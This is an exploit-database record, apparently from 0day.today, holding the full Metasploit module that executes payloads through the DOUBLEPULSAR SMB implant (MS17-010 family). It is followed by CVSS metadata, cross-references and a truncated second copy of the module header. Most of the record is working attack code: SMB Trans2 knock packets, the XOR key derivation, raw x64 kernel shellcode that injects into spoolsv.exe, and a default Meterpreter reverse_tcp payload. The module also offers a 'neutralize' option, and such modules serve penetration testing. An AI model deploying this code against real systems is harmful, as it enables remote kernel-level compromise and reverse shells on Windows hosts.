module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => 
{\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-11] #"}, "lastseen": "2021-10-11T00:23:49", "differentElements": ["sourceData"], "edition": 41}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "461e604cce0772d7a8fcaf42e274174a", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-12T10:30:51", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27802", 
"1337DAY-ID-29702", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96706", "SMNTC-96707", "SMNTC-96703", "SMNTC-96705", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
"TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-12T10:30:51", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-12T10:30:51", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => 
{\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n 